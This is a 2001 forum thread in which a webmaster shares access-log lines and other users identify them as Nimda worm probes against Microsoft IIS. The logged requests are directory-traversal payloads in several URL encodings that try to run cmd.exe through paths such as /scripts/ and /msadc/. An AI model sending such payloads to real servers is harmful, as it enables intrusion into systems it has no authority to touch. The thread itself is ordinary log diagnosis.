Welcome to WebmasterWorld Guest from 54.226.246.160

Forum Moderators: DixonJones & mademetop

Message Too Old, No Replies

1200 logs in 12h

Why is that ?

     

marcello

4:08 pm on Sep 18, 2001 (gmt 0)

10+ Year Member



I think they try to get info , but I am running linux...<br>
<code>
216.191.176.126 - - [18/Sep/2001:09:02:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:43 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:44 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:45 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:47 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:52 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:54 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:55 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:56 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
</code>

mark_roach

4:24 pm on Sep 18, 2001 (gmt 0)

10+ Year Member



Marcello

Looks like it could be some type of virus. It is being discussed here:

[webmasterworld.com...]

I am also seeing it in my logs.

skirril

4:38 pm on Sep 30, 2001 (gmt 0)

10+ Year Member



AFAIK this is the so called nimda worm.
As can be seen it tries to execute some shell on winnt/win2k/win xp?, using a hole in the MS IIS.

Apache is not vulnerable, afaik (except to the heavy loss of bandwidth).

 

Featured Threads

Hot Threads This Week

Hot Threads This Month